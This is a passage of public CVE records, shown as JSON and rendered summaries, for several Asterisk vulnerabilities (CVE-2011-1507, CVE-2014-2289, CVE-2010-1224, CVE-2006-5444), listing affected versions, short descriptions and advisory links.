  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T22:28:41.814Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "ADV-2011-1188",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2011/1188"
          },
          {
            "name": "FEDORA-2011-5835",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058922.html"
          },
          {
            "name": "DSA-2225",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.debian.org/security/2011/dsa-2225"
          },
          {
            "name": "1025432",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1025432"
          },
          {
            "name": "ADV-2011-1086",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2011/1086"
          },
          {
            "name": "ADV-2011-1107",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2011/1107"
          },
          {
            "name": "44529",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/44529"
          },
          {
            "name": "FEDORA-2011-6208",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059702.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.digium.com/pub/security/AST-2011-005.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://bugzilla.redhat.com/show_bug.cgi?id=698916"
          },
          {
            "name": "44197",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/44197"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2011-04-21T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Asterisk Open Source 1.4.x before 1.4.40.1, 1.6.1.x before 1.6.1.25, 1.6.2.x before 1.6.2.17.3, and 1.8.x before 1.8.3.3 and Asterisk Business Edition C.x.x before C.3.6.4 do not restrict the number of unauthenticated sessions to certain interfaces, which allows remote attackers to cause a denial of service (file descriptor exhaustion and disk space exhaustion) via a series of TCP connections."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2011-08-23T09:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "ADV-2011-1188",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2011/1188"
        },
        {
          "name": "FEDORA-2011-5835",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058922.html"
        },
        {
          "name": "DSA-2225",
          "tags": [
            "vendor-advisory",
            "x_refsource_DEBIAN"
          ],
          "url": "http://www.debian.org/security/2011/dsa-2225"
        },
        {
          "name": "1025432",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://securitytracker.com/id?1025432"
        },
        {
          "name": "ADV-2011-1086",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2011/1086"
        },
        {
          "name": "ADV-2011-1107",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2011/1107"
        },
        {
          "name": "44529",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/44529"
        },
        {
          "name": "FEDORA-2011-6208",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059702.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.digium.com/pub/security/AST-2011-005.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=698916"
        },
        {
          "name": "44197",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/44197"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2011-1507",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Asterisk Open Source 1.4.x before 1.4.40.1, 1.6.1.x before 1.6.1.25, 1.6.2.x before 1.6.2.17.3, and 1.8.x before 1.8.3.3 and Asterisk Business Edition C.x.x before C.3.6.4 do not restrict the number of unauthenticated sessions to certain interfaces, which allows remote attackers to cause a denial of service (file descriptor exhaustion and disk space exhaustion) via a series of TCP connections."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "ADV-2011-1188",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2011/1188"
            },
            {
              "name": "FEDORA-2011-5835",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-April/058922.html"
            },
            {
              "name": "DSA-2225",
              "refsource": "DEBIAN",
              "url": "http://www.debian.org/security/2011/dsa-2225"
            },
            {
              "name": "1025432",
              "refsource": "SECTRACK",
              "url": "http://securitytracker.com/id?1025432"
            },
            {
              "name": "ADV-2011-1086",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2011/1086"
            },
            {
              "name": "ADV-2011-1107",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2011/1107"
            },
            {
              "name": "44529",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/44529"
            },
            {
              "name": "FEDORA-2011-6208",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2011-May/059702.html"
            },
            {
              "name": "http://downloads.digium.com/pub/security/AST-2011-005.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.digium.com/pub/security/AST-2011-005.html"
            },
            {
              "name": "https://bugzilla.redhat.com/show_bug.cgi?id=698916",
              "refsource": "CONFIRM",
              "url": "https://bugzilla.redhat.com/show_bug.cgi?id=698916"
            },
            {
              "name": "44197",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/44197"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2011-1507",
    "datePublished": "2011-04-27T00:00:00",
    "dateReserved": "2011-03-23T00:00:00",
    "dateUpdated": "2024-08-06T22:28:41.814Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2014-2289

Vulnerability from cvelistv5

Published

2014-04-18 19:00

Modified

2024-08-06 10:06

Severity ?

Summary

res/res_pjsip_exten_state.c in the PJSIP channel driver in Asterisk Open Source 12.x before 12.1.0 allows remote authenticated users to cause a denial of service (crash) via a SUBSCRIBE request without any Accept headers, which triggers an invalid pointer dereference.

References

▼	URL	Tags
	https://issues.asterisk.org/jira/browse/ASTERISK-23139	x_refsource_CONFIRM
	http://downloads.asterisk.org/pub/security/AST-2014-004-12.diff	x_refsource_MISC
	http://downloads.asterisk.org/pub/security/AST-2014-004.html	x_refsource_CONFIRM
	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html	vendor-advisory, x_refsource_FEDORA
	http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html	vendor-advisory, x_refsource_FEDORA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T10:06:00.290Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23139"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-004-12.diff"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2014-004.html"
          },
          {
            "name": "FEDORA-2014-3762",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
          },
          {
            "name": "FEDORA-2014-3779",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2014-03-10T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "res/res_pjsip_exten_state.c in the PJSIP channel driver in Asterisk Open Source 12.x before 12.1.0 allows remote authenticated users to cause a denial of service (crash) via a SUBSCRIBE request without any Accept headers, which triggers an invalid pointer dereference."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2014-04-18T18:57:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23139"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-004-12.diff"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2014-004.html"
        },
        {
          "name": "FEDORA-2014-3762",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
        },
        {
          "name": "FEDORA-2014-3779",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-2289",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "res/res_pjsip_exten_state.c in the PJSIP channel driver in Asterisk Open Source 12.x before 12.1.0 allows remote authenticated users to cause a denial of service (crash) via a SUBSCRIBE request without any Accept headers, which triggers an invalid pointer dereference."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://issues.asterisk.org/jira/browse/ASTERISK-23139",
              "refsource": "CONFIRM",
              "url": "https://issues.asterisk.org/jira/browse/ASTERISK-23139"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-004-12.diff",
              "refsource": "MISC",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-004-12.diff"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2014-004.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2014-004.html"
            },
            {
              "name": "FEDORA-2014-3762",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130426.html"
            },
            {
              "name": "FEDORA-2014-3779",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2014-March/130400.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-2289",
    "datePublished": "2014-04-18T19:00:00",
    "dateReserved": "2014-03-05T00:00:00",
    "dateUpdated": "2024-08-06T10:06:00.290Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2010-1224

Vulnerability from cvelistv5

Published

2010-04-01 21:00

Modified

2024-08-07 01:14

Severity ?

Summary

main/acl.c in Asterisk Open Source 1.6.0.x before 1.6.0.25, 1.6.1.x before 1.6.1.17, and 1.6.2.x before 1.6.2.5 does not properly enforce remote host access controls when CIDR notation "/0" is used in permit= and deny= configuration rules, which causes an improper arithmetic shift and might allow remote attackers to bypass ACL rules and access services from unauthorized hosts.

References

▼	URL	Tags
	http://www.securityfocus.com/archive/1/509757/100/0/threaded	mailing-list, x_refsource_BUGTRAQ
	http://downloads.asterisk.org/pub/security/AST-2010-003.html	x_refsource_CONFIRM
	http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.2.diff	x_refsource_CONFIRM
	http://secunia.com/advisories/39096	third-party-advisory, x_refsource_SECUNIA
	http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037679.html	vendor-advisory, x_refsource_FEDORA
	http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.0.diff	x_refsource_CONFIRM
	http://www.vupen.com/english/advisories/2010/0475	vdb-entry, x_refsource_VUPEN
	http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.1.diff	x_refsource_CONFIRM
	http://osvdb.org/62588	vdb-entry, x_refsource_OSVDB
	https://exchange.xforce.ibmcloud.com/vulnerabilities/56552	vdb-entry, x_refsource_XF
	http://www.securityfocus.com/bid/38424	vdb-entry, x_refsource_BID
	http://secunia.com/advisories/38752	third-party-advisory, x_refsource_SECUNIA

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T01:14:06.690Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20100225 AST-2010-003: Invalid parsing of ACL rules can compromise security",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/509757/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2010-003.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.2.diff"
          },
          {
            "name": "39096",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/39096"
          },
          {
            "name": "FEDORA-2010-3724",
            "tags": [
              "vendor-advisory",
              "x_refsource_FEDORA",
              "x_transferred"
            ],
            "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037679.html"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.0.diff"
          },
          {
            "name": "ADV-2010-0475",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2010/0475"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.1.diff"
          },
          {
            "name": "62588",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/62588"
          },
          {
            "name": "asterisk-cidr-security-bypass(56552)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56552"
          },
          {
            "name": "38424",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/38424"
          },
          {
            "name": "38752",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/38752"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2010-02-25T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "main/acl.c in Asterisk Open Source 1.6.0.x before 1.6.0.25, 1.6.1.x before 1.6.1.17, and 1.6.2.x before 1.6.2.5 does not properly enforce remote host access controls when CIDR notation \"/0\" is used in permit= and deny= configuration rules, which causes an improper arithmetic shift and might allow remote attackers to bypass ACL rules and access services from unauthorized hosts."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-10T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20100225 AST-2010-003: Invalid parsing of ACL rules can compromise security",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/509757/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2010-003.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.2.diff"
        },
        {
          "name": "39096",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/39096"
        },
        {
          "name": "FEDORA-2010-3724",
          "tags": [
            "vendor-advisory",
            "x_refsource_FEDORA"
          ],
          "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037679.html"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.0.diff"
        },
        {
          "name": "ADV-2010-0475",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2010/0475"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.1.diff"
        },
        {
          "name": "62588",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/62588"
        },
        {
          "name": "asterisk-cidr-security-bypass(56552)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56552"
        },
        {
          "name": "38424",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/38424"
        },
        {
          "name": "38752",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/38752"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2010-1224",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "main/acl.c in Asterisk Open Source 1.6.0.x before 1.6.0.25, 1.6.1.x before 1.6.1.17, and 1.6.2.x before 1.6.2.5 does not properly enforce remote host access controls when CIDR notation \"/0\" is used in permit= and deny= configuration rules, which causes an improper arithmetic shift and might allow remote attackers to bypass ACL rules and access services from unauthorized hosts."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20100225 AST-2010-003: Invalid parsing of ACL rules can compromise security",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/509757/100/0/threaded"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2010-003.html",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2010-003.html"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.2.diff",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.2.diff"
            },
            {
              "name": "39096",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/39096"
            },
            {
              "name": "FEDORA-2010-3724",
              "refsource": "FEDORA",
              "url": "http://lists.fedoraproject.org/pipermail/package-announce/2010-March/037679.html"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.0.diff",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.0.diff"
            },
            {
              "name": "ADV-2010-0475",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2010/0475"
            },
            {
              "name": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.1.diff",
              "refsource": "CONFIRM",
              "url": "http://downloads.asterisk.org/pub/security/AST-2010-003-1.6.1.diff"
            },
            {
              "name": "62588",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/62588"
            },
            {
              "name": "asterisk-cidr-security-bypass(56552)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/56552"
            },
            {
              "name": "38424",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/38424"
            },
            {
              "name": "38752",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/38752"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2010-1224",
    "datePublished": "2010-04-01T21:00:00",
    "dateReserved": "2010-04-01T00:00:00",
    "dateUpdated": "2024-08-07T01:14:06.690Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

cve-2006-5444

Vulnerability from cvelistv5

Published

2006-10-23 17:00

Modified

2024-08-07 19:48

Severity ?

Summary

Integer overflow in the get_input function in the Skinny channel driver (chan_skinny.c) in Asterisk 1.0.x before 1.0.12 and 1.2.x before 1.2.13, as used by Cisco SCCP phones, allows remote attackers to execute arbitrary code via a certain dlen value that passes a signed integer comparison and leads to a heap-based buffer overflow.

References

▼	URL	Tags
	http://secunia.com/advisories/22480	third-party-advisory, x_refsource_SECUNIA
	http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13	x_refsource_CONFIRM
	http://www.us.debian.org/security/2006/dsa-1229	vendor-advisory, x_refsource_DEBIAN
	http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml	vendor-advisory, x_refsource_GENTOO
	http://www.novell.com/linux/security/advisories/2006_69_asterisk.html	vendor-advisory, x_refsource_SUSE
	http://www.securityfocus.com/bid/20617	vdb-entry, x_refsource_BID
	http://www.vupen.com/english/advisories/2006/4097	vdb-entry, x_refsource_VUPEN
	http://secunia.com/advisories/22651	third-party-advisory, x_refsource_SECUNIA
	http://www.osvdb.org/29972	vdb-entry, x_refsource_OSVDB
	http://www.securityfocus.com/archive/1/449183/100/0/threaded	vendor-advisory, x_refsource_OPENPKG
	http://lists.grok.org.uk/pipermail/full-disclosure/2006-October/050171.html	mailing-list, x_refsource_FULLDISC
	http://secunia.com/advisories/23212	third-party-advisory, x_refsource_SECUNIA
	http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.0.12	x_refsource_CONFIRM
	https://exchange.xforce.ibmcloud.com/vulnerabilities/29663	vdb-entry, x_refsource_XF
	http://www.kb.cert.org/vuls/id/521252	third-party-advisory, x_refsource_CERT-VN
	http://securitytracker.com/id?1017089	vdb-entry, x_refsource_SECTRACK
	http://secunia.com/advisories/22979	third-party-advisory, x_refsource_SECUNIA
	http://www.asterisk.org/node/109	x_refsource_CONFIRM
	http://www.securityfocus.com/archive/1/449127/100/0/threaded	mailing-list, x_refsource_BUGTRAQ

Impacted products

	Vendor	Product	Version
	n/a	n/a	Version: n/a

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T19:48:30.383Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "22480",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/22480"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.2.13"
          },
          {
            "name": "DSA-1229",
            "tags": [
              "vendor-advisory",
              "x_refsource_DEBIAN",
              "x_transferred"
            ],
            "url": "http://www.us.debian.org/security/2006/dsa-1229"
          },
          {
            "name": "GLSA-200610-15",
            "tags": [
              "vendor-advisory",
              "x_refsource_GENTOO",
              "x_transferred"
            ],
            "url": "http://www.gentoo.org/security/en/glsa/glsa-200610-15.xml"
          },
          {
            "name": "SUSE-SA:2006:069",
            "tags": [
              "vendor-advisory",
              "x_refsource_SUSE",
              "x_transferred"
            ],
            "url": "http://www.novell.com/linux/security/advisories/2006_69_asterisk.html"
          },
          {
            "name": "20617",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/20617"
          },
          {
            "name": "ADV-2006-4097",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/4097"
          },
          {
            "name": "22651",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/22651"
          },
          {
            "name": "29972",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://www.osvdb.org/29972"
          },
          {
            "name": "OpenPKG-SA-2006.024",
            "tags": [
              "vendor-advisory",
              "x_refsource_OPENPKG",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/449183/100/0/threaded"
          },
          {
            "name": "20061018 Asterisk remote heap overflow",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://lists.grok.org.uk/pipermail/full-disclosure/2006-October/050171.html"
          },
          {
            "name": "23212",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/23212"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://ftp.digium.com/pub/asterisk/releases/ChangeLog-1.0.12"
          },
          {
            "name": "asterisk-getinput-code-execution(29663)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/29663"
          },
          {
            "name": "VU#521252",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/521252"
          },
          {
            "name": "1017089",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://securitytracker.com/id?1017089"
          },
          {
            "name": "22979",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/22979"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
